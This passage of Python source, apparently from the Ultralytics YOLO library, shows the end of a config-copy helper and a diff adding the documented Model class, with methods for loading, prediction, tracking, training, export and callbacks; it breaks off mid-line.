        - The copy is made with shutil.copy2.
        - The original configuration file is left untouched.
    """
    copy_name = DEFAULT_CFG_PATH.name.replace(".yaml", "_copy.yaml")
    new_file = Path.cwd() / copy_name
    shutil.copy2(DEFAULT_CFG_PATH, new_file)
    message = (
        f"{DEFAULT_CFG_PATH} copied to {new_file}\n"
        f"Example YOLO command with this new custom cfg:\n yolo cfg='{new_file}' imgsz=320 batch=8"
    )
    LOGGER.info(message)
+ ckpt (Dict): The checkpoint data if the model is loaded from a *.pt file. + cfg (str): The configuration of the model if loaded from a *.yaml file. + ckpt_path (str): The path to the checkpoint file. + overrides (Dict): A dictionary of overrides for model configuration. + metrics (Dict): The latest training/validation metrics. + session (HUBTrainingSession): The Ultralytics HUB session, if applicable. + task (str): The type of task the model is intended for. + model_name (str): The name of the model. + + Methods: + __call__: Alias for the predict method, enabling the model instance to be callable. + _new: Initializes a new model based on a configuration file. + _load: Loads a model from a checkpoint file. + _check_is_pytorch_model: Ensures that the model is a PyTorch model. + reset_weights: Resets the model's weights to their initial state. + load: Loads model weights from a specified file. + save: Saves the current state of the model to a file. + info: Logs or returns information about the model. + fuse: Fuses Conv2d and BatchNorm2d layers for optimized inference. + predict: Performs object detection predictions. + track: Performs object tracking. + val: Validates the model on a dataset. + benchmark: Benchmarks the model on various export formats. + export: Exports the model to different formats. + train: Trains the model on a dataset. + tune: Performs hyperparameter tuning. + _apply: Applies a function to the model's tensors. + add_callback: Adds a callback function for an event. + clear_callback: Clears all callbacks for an event. + reset_callbacks: Resets all callbacks to their default functions. 
+ + Examples: + >>> from ultralytics import YOLO + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict("image.jpg") + >>> model.train(data="coco8.yaml", epochs=3) + >>> metrics = model.val() + >>> model.export(format="onnx") + """ + + def __init__( + self, + model: Union[str, Path] = "yolo11n.pt", + task: str = None, + verbose: bool = False, + ) -> None: + """ + Initializes a new instance of the YOLO model class. + + This constructor sets up the model based on the provided model path or name. It handles various types of + model sources, including local files, Ultralytics HUB models, and Triton Server models. The method + initializes several important attributes of the model and prepares it for operations like training, + prediction, or export. + + Args: + model (Union[str, Path]): Path or name of the model to load or create. Can be a local file path, a + model name from Ultralytics HUB, or a Triton Server model. + task (str | None): The task type associated with the YOLO model, specifying its application domain. + verbose (bool): If True, enables verbose output during the model's initialization and subsequent + operations. + + Raises: + FileNotFoundError: If the specified model file does not exist or is inaccessible. + ValueError: If the model file or configuration is invalid or unsupported. + ImportError: If required dependencies for specific model types (like HUB SDK) are not installed. 
+ + Examples: + >>> model = Model("yolo11n.pt") + >>> model = Model("path/to/model.yaml", task="detect") + >>> model = Model("hub_model", verbose=True) + """ + super().__init__() + self.callbacks = callbacks.get_default_callbacks() + self.predictor = None # reuse predictor + self.model = None # model object + self.trainer = None # trainer object + self.ckpt = None # if loaded from *.pt + self.cfg = None # if loaded from *.yaml + self.ckpt_path = None + self.overrides = {} # overrides for trainer object + self.metrics = None # validation/training metrics + self.session = None # HUB session + self.task = task # task type + model = str(model).strip() + + # Check if Ultralytics HUB model from https://hub.ultralytics.com + if self.is_hub_model(model): + # Fetch model from HUB + checks.check_requirements("hub-sdk>=0.0.12") + session = HUBTrainingSession.create_session(model) + model = session.model_file + if session.train_args: # training sent from HUB + self.session = session + + # Check if Triton Server model + elif self.is_triton_model(model): + self.model_name = self.model = model + self.overrides["task"] = task or "detect" # set `task=detect` if not explicitly set + return + + # Load or create new YOLO model + if Path(model).suffix in {".yaml", ".yml"}: + self._new(model, task=task, verbose=verbose) + else: + self._load(model, task=task) + + # Delete super().training for accessing self.model.training + del self.training + + def __call__( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Alias for the predict method, enabling the model instance to be callable for predictions. + + This method simplifies the process of making predictions by allowing the model instance to be called + directly with the required arguments. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of + the image(s) to make predictions on. 
Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. 
+ + Examples: + >>> Model.is_hub_model("https://hub.ultralytics.com/models/MODEL") + True + >>> Model.is_hub_model("yolo11n.pt") + False + """ + return model.startswith(f"{HUB_WEB_ROOT}/models/") + + def _new(self, cfg: str, task=None, model=None, verbose=False) -> None: + """ + Initializes a new model and infers the task type from the model definitions. + + This method creates a new model instance based on the provided configuration file. It loads the model + configuration, infers the task type if not specified, and initializes the model using the appropriate + class from the task map. + + Args: + cfg (str): Path to the model configuration file in YAML format. + task (str | None): The specific task for the model. If None, it will be inferred from the config. + model (torch.nn.Module | None): A custom model instance. If provided, it will be used instead of creating + a new one. + verbose (bool): If True, displays model information during loading. + + Raises: + ValueError: If the configuration file is invalid or the task cannot be inferred. + ImportError: If the required dependencies for the specified task are not installed. + + Examples: + >>> model = Model() + >>> model._new("yolov8n.yaml", task="detect", verbose=True) + """ + cfg_dict = yaml_model_load(cfg) + self.cfg = cfg + self.task = task or guess_model_task(cfg_dict) + self.model = (model or self._smart_load("model"))(cfg_dict, verbose=verbose and RANK == -1) # build model + self.overrides["model"] = self.cfg + self.overrides["task"] = self.task + + # Below added to allow export from YAMLs + self.model.args = {**DEFAULT_CFG_DICT, **self.overrides} # combine default and model args (prefer model args) + self.model.task = self.task + self.model_name = cfg + + def _load(self, weights: str, task=None) -> None: + """ + Loads a model from a checkpoint file or initializes it from a weights file. + + This method handles loading models from either .pt checkpoint files or other weight file formats. 
It sets + up the model, task, and related attributes based on the loaded weights. + + Args: + weights (str): Path to the model weights file to be loaded. + task (str | None): The task associated with the model. If None, it will be inferred from the model. + + Raises: + FileNotFoundError: If the specified weights file does not exist or is inaccessible. + ValueError: If the weights file format is unsupported or invalid. + + Examples: + >>> model = Model() + >>> model._load("yolo11n.pt") + >>> model._load("path/to/weights.pth", task="detect") + """ + if weights.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): + weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"]) # download and return local file + weights = checks.check_model_file_from_stem(weights) # add suffix, i.e. yolov8n -> yolov8n.pt + + if Path(weights).suffix == ".pt": + self.model, self.ckpt = attempt_load_one_weight(weights) + self.task = self.model.args["task"] + self.overrides = self.model.args = self._reset_ckpt_args(self.model.args) + self.ckpt_path = self.model.pt_path + else: + weights = checks.check_file(weights) # runs in all cases, not redundant with above call + self.model, self.ckpt = weights, None + self.task = task or guess_model_task(weights) + self.ckpt_path = weights + self.overrides["model"] = weights + self.overrides["task"] = self.task + self.model_name = weights + + def _check_is_pytorch_model(self) -> None: + """ + Checks if the model is a PyTorch model and raises a TypeError if it's not. + + This method verifies that the model is either a PyTorch module or a .pt file. It's used to ensure that + certain operations that require a PyTorch model are only performed on compatible model types. + + Raises: + TypeError: If the model is not a PyTorch module or a .pt file. The error message provides detailed + information about supported model formats and operations. 
+ + Examples: + >>> model = Model("yolo11n.pt") + >>> model._check_is_pytorch_model() # No error raised + >>> model = Model("yolov8n.onnx") + >>> model._check_is_pytorch_model() # Raises TypeError + """ + pt_str = isinstance(self.model, (str, Path)) and Path(self.model).suffix == ".pt" + pt_module = isinstance(self.model, nn.Module) + if not (pt_module or pt_str): + raise TypeError( + f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. " + f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported " + f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, " + f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device " + f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'" + ) + + def reset_weights(self) -> "Model": + """ + Resets the model's weights to their initial state. + + This method iterates through all modules in the model and resets their parameters if they have a + 'reset_parameters' method. It also ensures that all parameters have 'requires_grad' set to True, + enabling them to be updated during training. + + Returns: + (Model): The instance of the class with reset weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.reset_weights() + """ + self._check_is_pytorch_model() + for m in self.model.modules(): + if hasattr(m, "reset_parameters"): + m.reset_parameters() + for p in self.model.parameters(): + p.requires_grad = True + return self + + def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model": + """ + Loads parameters from the specified weights file into the model. + + This method supports loading weights from a file or directly from a weights object. It matches parameters by + name and shape and transfers them to the model. 
+ + Args: + weights (Union[str, Path]): Path to the weights file or a weights object. + + Returns: + (Model): The instance of the class with loaded weights. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model() + >>> model.load("yolo11n.pt") + >>> model.load(Path("path/to/weights.pt")) + """ + self._check_is_pytorch_model() + if isinstance(weights, (str, Path)): + self.overrides["pretrained"] = weights # remember the weights for DDP training + weights, self.ckpt = attempt_load_one_weight(weights) + self.model.load(weights) + return self + + def save(self, filename: Union[str, Path] = "saved_model.pt") -> None: + """ + Saves the current model state to a file. + + This method exports the model's checkpoint (ckpt) to the specified filename. It includes metadata such as + the date, Ultralytics version, license information, and a link to the documentation. + + Args: + filename (Union[str, Path]): The name of the file to save the model to. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.save("my_model.pt") + """ + self._check_is_pytorch_model() + from copy import deepcopy + from datetime import datetime + + from ultralytics import __version__ + + updates = { + "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model, + "date": datetime.now().isoformat(), + "version": __version__, + "license": "AGPL-3.0 License (https://ultralytics.com/license)", + "docs": "https://docs.ultralytics.com", + } + torch.save({**self.ckpt, **updates}, filename) + + def info(self, detailed: bool = False, verbose: bool = True): + """ + Logs or returns model information. + + This method provides an overview or detailed information about the model, depending on the arguments + passed. It can control the verbosity of the output and return the information as a list. 
+ + Args: + detailed (bool): If True, shows detailed information about the model layers and parameters. + verbose (bool): If True, prints the information. If False, returns the information as a list. + + Returns: + (List[str]): A list of strings containing various types of information about the model, including + model summary, layer details, and parameter counts. Empty if verbose is True. + + Raises: + TypeError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.info() # Prints model summary + >>> info_list = model.info(detailed=True, verbose=False) # Returns detailed info as a list + """ + self._check_is_pytorch_model() + return self.model.info(detailed=detailed, verbose=verbose) + + def fuse(self): + """ + Fuses Conv2d and BatchNorm2d layers in the model for optimized inference. + + This method iterates through the model's modules and fuses consecutive Conv2d and BatchNorm2d layers + into a single layer. This fusion can significantly improve inference speed by reducing the number of + operations and memory accesses required during forward passes. + + The fusion process typically involves folding the BatchNorm2d parameters (mean, variance, weight, and + bias) into the preceding Conv2d layer's weights and biases. This results in a single Conv2d layer that + performs both convolution and normalization in one step. + + Raises: + TypeError: If the model is not a PyTorch nn.Module. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model.fuse() + >>> # Model is now fused and ready for optimized inference + """ + self._check_is_pytorch_model() + self.model.fuse() + + def embed( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + **kwargs, + ) -> list: + """ + Generates image embeddings based on the provided source. + + This method is a wrapper around the 'predict()' method, focusing on generating embeddings from an image + source. 
It allows customization of the embedding process through various keyword arguments. + + Args: + source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for + generating embeddings. Can be a file path, URL, PIL image, numpy array, etc. + stream (bool): If True, predictions are streamed. + **kwargs (Any): Additional keyword arguments for configuring the embedding process. + + Returns: + (List[torch.Tensor]): A list containing the image embeddings. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> image = "https://ultralytics.com/images/bus.jpg" + >>> embeddings = model.embed(image) + >>> print(embeddings[0].shape) + """ + if not kwargs.get("embed"): + kwargs["embed"] = [len(self.model.model) - 2] # embed second-to-last layer if no indices passed + return self.predict(source, stream, **kwargs) + + def predict( + self, + source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + predictor=None, + **kwargs, + ) -> List[Results]: + """ + Performs predictions on the given image source using the YOLO model. + + This method facilitates the prediction process, allowing various configurations through keyword arguments. + It supports predictions with custom predictors or the default predictor method. The method handles different + types of image sources and can operate in a streaming mode. + + Args: + source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source + of the image(s) to make predictions on. Accepts various types including file paths, URLs, PIL + images, numpy arrays, and torch tensors. + stream (bool): If True, treats the input source as a continuous stream for predictions. + predictor (BasePredictor | None): An instance of a custom predictor class for making predictions. + If None, the method uses a default predictor. 
+ **kwargs (Any): Additional keyword arguments for configuring the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.predict(source="path/to/image.jpg", conf=0.25) + >>> for r in results: + ... print(r.boxes.data) # print detection bounding boxes + + Notes: + - If 'source' is not provided, it defaults to the ASSETS constant with a warning. + - The method sets up a new predictor if not already present and updates its arguments with each call. + - For SAM-type models, 'prompts' can be passed as a keyword argument. + """ + if source is None: + source = ASSETS + LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.") + + is_cli = (ARGV[0].endswith("yolo") or ARGV[0].endswith("ultralytics")) and any( + x in ARGV for x in ("predict", "track", "mode=predict", "mode=track") + ) + + custom = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"} # method defaults + args = {**self.overrides, **custom, **kwargs} # highest priority args on the right + prompts = args.pop("prompts", None) # for SAM-type models + + if not self.predictor: + self.predictor = (predictor or self._smart_load("predictor"))(overrides=args, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=is_cli) + else: # only update args if predictor is already setup + self.predictor.args = get_cfg(self.predictor.args, args) + if "project" in args or "name" in args: + self.predictor.save_dir = get_save_dir(self.predictor.args) + if prompts and hasattr(self.predictor, "set_prompts"): # for SAM-type models + self.predictor.set_prompts(prompts) + return self.predictor.predict_cli(source=source) if is_cli else self.predictor(source=source, stream=stream) + + def track( + self, + source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None, + stream: bool = False, + persist: bool = 
False, + **kwargs, + ) -> List[Results]: + """ + Conducts object tracking on the specified input source using the registered trackers. + + This method performs object tracking using the model's predictors and optionally registered trackers. It handles + various input sources such as file paths or video streams, and supports customization through keyword arguments. + The method registers trackers if not already present and can persist them between calls. + + Args: + source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object + tracking. Can be a file path, URL, or video stream. + stream (bool): If True, treats the input source as a continuous video stream. Defaults to False. + persist (bool): If True, persists trackers between different calls to this method. Defaults to False. + **kwargs (Any): Additional keyword arguments for configuring the tracking process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object. + + Raises: + AttributeError: If the predictor does not have registered trackers. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.track(source="path/to/video.mp4", show=True) + >>> for r in results: + ... print(r.boxes.id) # print tracking IDs + + Notes: + - This method sets a default confidence threshold of 0.1 for ByteTrack-based tracking. + - The tracking mode is explicitly set in the keyword arguments. + - Batch size is set to 1 for tracking in videos. 
+ """ + if not hasattr(self.predictor, "trackers"): + from ultralytics.trackers import register_tracker + + register_tracker(self, persist) + kwargs["conf"] = kwargs.get("conf") or 0.1 # ByteTrack-based method needs low confidence predictions as input + kwargs["batch"] = kwargs.get("batch") or 1 # batch-size 1 for tracking in videos + kwargs["mode"] = "track" + return self.predict(source=source, stream=stream, **kwargs) + + def val( + self, + validator=None, + **kwargs, + ): + """ + Validates the model using a specified dataset and validation configuration. + + This method facilitates the model validation process, allowing for customization through various settings. It + supports validation with a custom validator or the default validation approach. The method combines default + configurations, method-specific defaults, and user-provided arguments to configure the validation process. + + Args: + validator (ultralytics.engine.validator.BaseValidator | None): An instance of a custom validator class for + validating the model. + **kwargs (Any): Arbitrary keyword arguments for customizing the validation process. + + Returns: + (ultralytics.utils.metrics.DetMetrics): Validation metrics obtained from the validation process. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.val(data="coco8.yaml", imgsz=640) + >>> print(results.box.map) # Print mAP50-95 + """ + custom = {"rect": True} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "val"} # highest priority args on the right + + validator = (validator or self._smart_load("validator"))(args=args, _callbacks=self.callbacks) + validator(model=self.model) + self.metrics = validator.metrics + return validator.metrics + + def benchmark( + self, + **kwargs, + ): + """ + Benchmarks the model across various export formats to evaluate performance. 
+ + This method assesses the model's performance in different export formats, such as ONNX, TorchScript, etc. + It uses the 'benchmark' function from the ultralytics.utils.benchmarks module. The benchmarking is + configured using a combination of default configuration values, model-specific arguments, method-specific + defaults, and any additional user-provided keyword arguments. + + Args: + **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. These are combined with + default configurations, model-specific arguments, and method defaults. Common options include: + - data (str): Path to the dataset for benchmarking. + - imgsz (int | List[int]): Image size for benchmarking. + - half (bool): Whether to use half-precision (FP16) mode. + - int8 (bool): Whether to use int8 precision mode. + - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda'). + - verbose (bool): Whether to print detailed benchmark information. + + Returns: + (Dict): A dictionary containing the results of the benchmarking process, including metrics for + different export formats. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True) + >>> print(results) + """ + self._check_is_pytorch_model() + from ultralytics.utils.benchmarks import benchmark + + custom = {"verbose": False} # method defaults + args = {**DEFAULT_CFG_DICT, **self.model.args, **custom, **kwargs, "mode": "benchmark"} + return benchmark( + model=self, + data=kwargs.get("data"), # if no 'data' argument passed set data=None for default datasets + imgsz=args["imgsz"], + half=args["half"], + int8=args["int8"], + device=args["device"], + verbose=kwargs.get("verbose"), + ) + + def export( + self, + **kwargs, + ) -> str: + """ + Exports the model to a different format suitable for deployment. 
+ + This method facilitates the export of the model to various formats (e.g., ONNX, TorchScript) for deployment + purposes. It uses the 'Exporter' class for the export process, combining model-specific overrides, method + defaults, and any additional arguments provided. + + Args: + **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with + the model's overrides and method defaults. Common arguments include: + format (str): Export format (e.g., 'onnx', 'engine', 'coreml'). + half (bool): Export model in half-precision. + int8 (bool): Export model in int8 precision. + device (str): Device to run the export on. + workspace (int): Maximum memory workspace size for TensorRT engines. + nms (bool): Add Non-Maximum Suppression (NMS) module to model. + simplify (bool): Simplify ONNX model. + + Returns: + (str): The path to the exported model file. + + Raises: + AssertionError: If the model is not a PyTorch model. + ValueError: If an unsupported export format is specified. + RuntimeError: If the export process fails due to errors. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.export(format="onnx", dynamic=True, simplify=True) + 'path/to/exported/model.onnx' + """ + self._check_is_pytorch_model() + from .exporter import Exporter + + custom = { + "imgsz": self.model.args["imgsz"], + "batch": 1, + "data": None, + "device": None, # reset to avoid multi-GPU errors + "verbose": False, + } # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "export"} # highest priority args on the right + return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model) + + def train( + self, + trainer=None, + **kwargs, + ): + """ + Trains the model using the specified dataset and training configuration. + + This method facilitates model training with a range of customizable settings. It supports training with a + custom trainer or the default training approach. 
The method handles scenarios such as resuming training + from a checkpoint, integrating with Ultralytics HUB, and updating model and configuration after training. + + When using Ultralytics HUB, if the session has a loaded model, the method prioritizes HUB training + arguments and warns if local arguments are provided. It checks for pip updates and combines default + configurations, method-specific defaults, and user-provided arguments to configure the training process. + + Args: + trainer (BaseTrainer | None): Custom trainer instance for model training. If None, uses default. + **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include: + data (str): Path to dataset configuration file. + epochs (int): Number of training epochs. + batch_size (int): Batch size for training. + imgsz (int): Input image size. + device (str): Device to run training on (e.g., 'cuda', 'cpu'). + workers (int): Number of worker threads for data loading. + optimizer (str): Optimizer to use for training. + lr0 (float): Initial learning rate. + patience (int): Epochs to wait for no observable improvement for early stopping of training. + + Returns: + (Dict | None): Training metrics if available and training is successful; otherwise, None. + + Raises: + AssertionError: If the model is not a PyTorch model. + PermissionError: If there is a permission issue with the HUB session. + ModuleNotFoundError: If the HUB SDK is not installed. 
+ + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.train(data="coco8.yaml", epochs=3) + """ + self._check_is_pytorch_model() + if hasattr(self.session, "model") and self.session.model.id: # Ultralytics HUB session with loaded model + if any(kwargs): + LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.") + kwargs = self.session.train_args # overwrite kwargs + + checks.check_pip_update_available() + + overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides + custom = { + # NOTE: handle the case when 'cfg' includes 'data'. + "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task], + "model": self.overrides["model"], + "task": self.task, + } # method defaults + args = {**overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + if args.get("resume"): + args["resume"] = self.ckpt_path + + self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks) + if not args.get("resume"): # manually set model only if not resuming + self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml) + self.model = self.trainer.model + + self.trainer.hub_session = self.session # attach optional HUB session + self.trainer.train() + # Update model and cfg after training + if RANK in {-1, 0}: + ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last + self.model, _ = attempt_load_one_weight(ckpt) + self.overrides = self.model.args + self.metrics = getattr(self.trainer.validator, "metrics", None) # TODO: no metrics returned by DDP + return self.metrics + + def tune( + self, + use_ray=False, + iterations=10, + *args, + **kwargs, + ): + """ + Conducts hyperparameter tuning for the model, with an option to use Ray Tune. + + This method supports two modes of hyperparameter tuning: using Ray Tune or a custom tuning method. 
+ When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. 
+ + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. 
+ + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... 
print("Training is starting!") + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", on_train_start) + >>> model.train(data="coco8.yaml", epochs=1) + """ + self.callbacks[event].append(func) + + def clear_callback(self, event: str) -> None: + """ + Clears all callback functions registered for a specified event. + + This method removes all custom and default callback functions associated with the given event. + It resets the callback list for the specified event to an empty list, effectively removing all + registered callbacks for that event. + + Args: + event (str): The name of the event for which to clear the callbacks. This should be a valid event name + recognized by the Ultralytics callback system. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", lambda: print("Training started")) + >>> model.clear_callback("on_train_start") + >>> # All callbacks for 'on_train_start' are now removed + + Notes: + - This method affects both custom callbacks added by the user and default callbacks + provided by the Ultralytics framework. + - After calling this method, no callbacks will be executed for the specified event + until new ones are added. + - Use with caution as it removes all callbacks, including essential ones that might + be required for proper functioning of certain operations. + """ + self.callbacks[event] = [] + + def reset_callbacks(self) -> None: + """ + Resets all callbacks to their default functions. + + This method reinstates the default callback functions for all events, removing any custom callbacks that were + previously added. It iterates through all default callback events and replaces the current callbacks with the + default ones. + + The default callbacks are defined in the 'callbacks.default_callbacks' dictionary, which contains predefined + functions for various events in the model's lifecycle, such as on_train_start, on_epoch_end, etc. 
+ + This method is useful when you want to revert to the original set of callbacks after making custom + modifications, ensuring consistent behavior across different runs or experiments. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> model.add_callback("on_train_start", custom_function) + >>> model.reset_callbacks() + # All callbacks are now reset to their default functions + """ + for event in callbacks.default_callbacks.keys(): + self.callbacks[event] = [callbacks.default_callbacks[event][0]] + + @staticmethod + def _reset_ckpt_args(args: dict) -> dict: + """ + Resets specific arguments when loading a PyTorch model checkpoint. + + This static method filters the input arguments dictionary to retain only a specific set of keys that are + considered important for model loading. It's used to ensure that only relevant arguments are preserved + when loading a model from a checkpoint, discarding any unnecessary or potentially conflicting settings. + + Args: + args (dict): A dictionary containing various model arguments and settings. + + Returns: + (dict): A new dictionary containing only the specified include keys from the input arguments. + + Examples: + >>> original_args = {"imgsz": 640, "data": "coco.yaml", "task": "detect", "batch": 16, "epochs": 100} + >>> reset_args = Model._reset_ckpt_args(original_args) + >>> print(reset_args) + {'imgsz': 640, 'data': 'coco.yaml', 'task': 'detect'} + """ + include = {"imgsz", "data", "task", "single_cls"} # only remember these arguments when loading a PyTorch model + return {k: v for 